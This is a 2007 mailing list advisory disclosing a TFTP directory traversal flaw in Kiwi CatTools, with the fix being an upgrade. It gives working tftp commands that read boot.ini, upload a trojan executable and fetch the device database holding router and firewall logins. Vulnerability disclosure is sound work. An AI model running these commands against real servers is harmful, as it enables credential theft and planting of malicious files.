[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] TFTP directory traversal in Kiwi CatTools

To: vulnwatch@xxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] TFTP directory traversal in Kiwi CatTools
From: Nicob <nicob@xxxxxxxxx>
Date: Thu, 08 Feb 2007 23:28:56 +0100

        TFTP directory traversal in Kiwi CatTools


Application : Kiwi CatTools prior to 3.2.0 beta
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>

Product :
=========

http://www.kiwisyslog.com/cattools-info.php :

"Kiwi CatTools is a freeware application that provides automated device
configuration management on routers, switches and firewalls."

A built-in TFTP server exists and a "encrypted device database" contains
IP addresses, logins and passwords for each configured device.

Vunerability :
==============

TFTP directory traversal :

tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe

Note : the device database is only protected by a reversible encoding
and can be remotely accessed with "GET a//..//..//kiwidb-cattools.kdb".

Solution :
==========

Upgrade to version 3.2.0 beta or newer.


Nicob

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technical details)
Next by Date: [Full-disclosure] List Charter
Previous by thread: [Full-disclosure] Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technical details)
Next by thread: [Full-disclosure] List Charter
Index(es):
- Date
- Thread